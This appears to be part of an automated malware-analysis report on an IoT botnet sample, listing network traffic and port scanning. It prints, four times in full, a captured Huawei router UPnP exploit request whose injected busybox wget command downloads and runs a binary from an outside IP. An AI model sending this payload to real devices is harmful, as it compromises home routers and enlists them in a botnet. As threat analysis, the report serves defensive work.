Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60430 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60440 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60432 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 60422
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 60432
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44516 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 53954
Source: unknown	Network traffic detected: HTTP traffic on port 53958 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 53958
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60208 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52738 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58508 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34680 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42850 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41654 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44520 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51628 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39502 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53696 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53706 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45424 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 33774
Source: unknown	Network traffic detected: HTTP traffic on port 45428 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 33780
Source: unknown	Network traffic detected: HTTP traffic on port 49118 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 197.132.5.65 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 185.68.235.176 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 91.156.37.23 ports 2,5,6,8,9,52869

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
